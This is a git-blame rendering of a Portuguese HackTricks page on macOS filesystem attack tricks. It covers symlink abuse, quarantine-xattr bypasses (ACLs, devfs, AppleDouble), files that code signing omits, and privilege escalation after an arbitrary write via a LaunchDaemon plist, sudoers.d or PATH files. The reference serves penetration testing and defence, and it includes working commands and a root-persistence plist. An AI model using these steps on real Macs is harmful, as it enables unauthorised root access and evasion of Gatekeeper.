Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-19 09:34:03 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md

294 lines
13 KiB
Markdown
Raw Normal View History

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
# Truques do Sistema de Arquivos do macOS
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
* Você trabalha em uma **empresa de cibersegurança**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-me no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
## Combinações de permissões POSIX
Permissões em um **diretório**:
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
* **read** - você pode **enumerar** as entradas do diretório
* **write** - você pode **deletar/escrever** **arquivos** no diretório e pode **deletar pastas vazias**.
* Mas você **não pode deletar/modificar pastas não vazias** a menos que tenha permissões de escrita sobre ela.
* Você **não pode modificar o nome de uma pasta** a menos que seja o proprietário.
* **execute** - você tem **permissão para atravessar** o diretório - se você não tiver esse direito, não poderá acessar nenhum arquivo dentro dele ou em qualquer subdiretório.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
### Combinações Perigosas
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
**Como sobrescrever um arquivo/pasta pertencente ao root**, mas:
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
* Um **proprietário de diretório pai** no caminho é o usuário
* Um **proprietário de diretório pai** no caminho é um **grupo de usuários** com **acesso de escrita**
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
* Um **grupo de usuários** tem **acesso de escrita** ao **arquivo**
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Com qualquer uma das combinações anteriores, um atacante poderia **injetar** um **link simbólico/direto** no caminho esperado para obter uma escrita arbitrária privilegiada.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
### Caso Especial de Pasta root R+X
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Se houver arquivos em um **diretório** onde **apenas o root tem acesso R+X**, esses **não são acessíveis a mais ninguém**. Portanto, uma vulnerabilidade que permita **mover um arquivo legível por um usuário**, que não pode ser lido por causa dessa **restrição**, de uma pasta **para outra diferente**, poderia ser abusada para ler esses arquivos.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
Exemplo em: [https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/#nix-directory-permissions](https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/#nix-directory-permissions)
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
## Link Simbólico / Link Direto
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Se um processo privilegiado estiver escrevendo dados em um **arquivo** que pode ser **controlado** por um **usuário de menor privilégio**, ou que poderia ser **criado previamente** por um usuário de menor privilégio. O usuário poderia simplesmente **apontá-lo para outro arquivo** através de um Link Simbólico ou Direto, e o processo privilegiado escreverá nesse arquivo.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Verifique nas outras seções onde um atacante poderia **abusar de uma escrita arbitrária para escalar privilégios**.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi
2023-12-16 14:29:43 +00:00
## .fileloc
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Arquivos com a extensão **`.fileloc`** podem apontar para outras aplicações ou binários, então quando são abertos, a aplicação/binário será executado.\
Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi
2023-12-16 14:29:43 +00:00
Exemplo:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>URL</key>
<string>file:///System/Applications/Calculator.app</string>
<key>URLPrefix</key>
<integer>0</integer>
</dict>
</plist>
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
## FD Arbitrário
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Se você conseguir fazer um **processo abrir um arquivo ou uma pasta com altos privilégios**, você pode abusar do **`crontab`** para abrir um arquivo em `/etc/sudoers.d` com **`EDITOR=exploit.py`**, assim o `exploit.py` receberá o FD para o arquivo dentro de `/etc/sudoers` e poderá abusá-lo.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
Por exemplo: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098)
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
## Truques para evitar atributos de quarentena xattrs
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-01 18:41:39 +00:00
### Removê-lo
```bash
xattr -d com.apple.quarantine /path/to/file_or_app
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
### uchg / uchange / uimmutable flag
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Se um arquivo/pasta tem esse atributo imutável, não será possível colocar um xattr nele
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
```bash
echo asd > /tmp/asd
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
chflags uchg /tmp/asd # "chflags uchange /tmp/asd" or "chflags uimmutable /tmp/asd"
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
xattr -w com.apple.quarantine "" /tmp/asd
xattr: [Errno 1] Operation not permitted: '/tmp/asd'
ls -lO /tmp/asd
# check the "uchg" in the output
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
### montagem devfs
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Uma montagem **devfs** **não suporta xattr**, mais informações em [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
```bash
mkdir /tmp/mnt
mount_devfs -o noowners none "/tmp/mnt"
chmod 777 /tmp/mnt
mkdir /tmp/mnt/lol
xattr -w com.apple.quarantine "" /tmp/mnt/lol
xattr: [Errno 1] Operation not permitted: '/tmp/mnt/lol'
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
### writeextattr ACL
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Este ACL impede a adição de `xattrs` ao arquivo
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
```bash
rm -rf /tmp/test*
echo test >/tmp/test
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test
ls -le /tmp/test
ditto -c -k test test.zip
# Download the zip from the browser and decompress it, the file should be without a quarantine xattr
cd /tmp
echo y | rm test
# Decompress it with ditto
ditto -x -k --rsrc test.zip .
ls -le /tmp/test
# Decompress it with open (if sandboxed decompressed files go to the Downloads folder)
open test.zip
sleep 1
ls -le /tmp/test
```
### **com.apple.acl.text xattr + AppleDouble**
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
O formato de arquivo **AppleDouble** copia um arquivo incluindo seus ACEs.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
No [**código-fonte**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html), é possível ver que a representação de texto da ACL armazenada dentro do xattr chamado **`com.apple.acl.text`** será definida como ACL no arquivo descomprimido. Então, se você comprimiu um aplicativo em um arquivo zip com o formato de arquivo **AppleDouble** com uma ACL que impede que outros xattrs sejam escritos nele... o xattr de quarentena não foi definido na aplicação:
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Confira o [**relatório original**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) para mais informações.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
Para replicar isso, primeiro precisamos obter a string de acl correta:
```bash
# Everything will be happening here
mkdir /tmp/temp_xattrs
cd /tmp/temp_xattrs
# Create a folder and a file with the acls and xattr
mkdir del
mkdir del/test_fold
echo test > del/test_fold/test_file
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold/test_file
ditto -c -k del test.zip
# uncomporess to get it back
ditto -x -k --rsrc test.zip .
ls -le test
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
(Note que mesmo que isso funcione, o sandbox escreve o atributo de quarentena xattr antes)
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Não é realmente necessário, mas deixo aqui apenas por precaução:
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
{% content-ref url="macos-xattr-acls-extra-stuff.md" %}
[macos-xattr-acls-extra-stuff.md](macos-xattr-acls-extra-stuff.md)
{% endcontent-ref %}
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
## Burlar Assinaturas de Código
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-01 16:27:09 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Pacotes contêm o arquivo **`_CodeSignature/CodeResources`** que contém o **hash** de cada **arquivo** no **pacote**. Note que o hash do CodeResources também está **embutido no executável**, então não podemos mexer nisso também.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-01 16:27:09 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
No entanto, existem alguns arquivos cuja assinatura não será verificada, estes têm a chave omit no plist, como:
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-01 16:27:09 +00:00
```xml
<dict>
...
<key>rules</key>
<dict>
...
<key>^Resources/.*\.lproj/locversion.plist$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>1100</real>
</dict>
...
</dict>
<key>rules2</key>
...
<key>^(.*/)?\.DS_Store$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>2000</real>
</dict>
...
<key>^PkgInfo$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>20</real>
</dict>
...
<key>^Resources/.*\.lproj/locversion.plist$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>1100</real>
</dict>
...
</dict>
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
É possível calcular a assinatura de um recurso a partir do cli com:
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-04 20:11:49 +00:00
{% code overflow="wrap" %}
```bash
openssl dgst -binary -sha1 /System/Cryptexes/App/System/Applications/Safari.app/Contents/Resources/AppIcon.icns | openssl base64
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
{% endcode %}
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
## Montar dmgs
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Um usuário pode montar um dmg personalizado criado até mesmo sobre algumas pastas existentes. Veja como você pode criar um pacote dmg personalizado com conteúdo personalizado:
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
{% code overflow="wrap" %}
```bash
# Create the volume
hdiutil create /private/tmp/tmp.dmg -size 2m -ov -volname CustomVolName -fs APFS 1>/dev/null
mkdir /private/tmp/mnt
# Mount it
hdiutil attach -mountpoint /private/tmp/mnt /private/tmp/tmp.dmg 1>/dev/null
# Add custom content to the volume
mkdir /private/tmp/mnt/custom_folder
echo "hello" > /private/tmp/mnt/custom_folder/custom_file
# Detach it
hdiutil detach /private/tmp/mnt 1>/dev/null
# Next time you mount it, it will have the custom content you wrote
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-01 16:46:38 +00:00
# You can also create a dmg from an app using:
hdiutil create -srcfolder justsome.app justsome.dmg
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
```
{% endcode %}
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
## Escritas Arbitrárias
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
### Scripts sh periódicos
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Se o seu script puder ser interpretado como um **script de shell**, você poderá sobrescrever o script de shell **`/etc/periodic/daily/999.local`**, que será acionado todos os dias.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Você pode **fingir** uma execução deste script com: **`sudo periodic daily`**
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
### Daemons
Escreva um **LaunchDaemon** arbitrário como **`/Library/LaunchDaemons/xyz.hacktricks.privesc.plist`** com um plist executando um script arbitrário como:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.sample.Load</string>
<key>ProgramArguments</key>
<array>
<string>/Applications/Scripts/privesc.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
```markdown
Gere o script `/Applications/Scripts/privesc.sh` com os **comandos** que você gostaria de executar como root.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
### Arquivo Sudoers
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
Se você tem **escrita arbitrária**, você poderia criar um arquivo dentro da pasta **`/etc/sudoers.d/`** concedendo a si mesmo privilégios de **sudo**.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
Translated ['generic-methodologies-and-resources/external-recon-methodol
2023-12-11 09:52:48 +00:00
### Arquivos PATH
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
O arquivo **`/etc/paths`** é um dos principais locais que populam a variável de ambiente PATH. Você deve ser root para sobrescrevê-lo, mas se um script de um **processo privilegiado** estiver executando algum **comando sem o caminho completo**, você pode ser capaz de **sequestrar** a execução modificando este arquivo.
Translated ['generic-methodologies-and-resources/external-recon-methodol
2023-12-11 09:52:48 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
&#x20;Você também pode escrever arquivos em **`/etc/paths.d`** para carregar novas pastas na variável de ambiente `PATH`.
Translated ['generic-methodologies-and-resources/external-recon-methodol
2023-12-11 09:52:48 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:48 +00:00
## Referências
* [https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/](https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/)
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
* Você trabalha em uma **empresa de cibersegurança**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* Adquira o [**material oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-me no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:56:06 +00:00
</details>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:55:52 +00:00
```
Reference in a new issue Copy permalink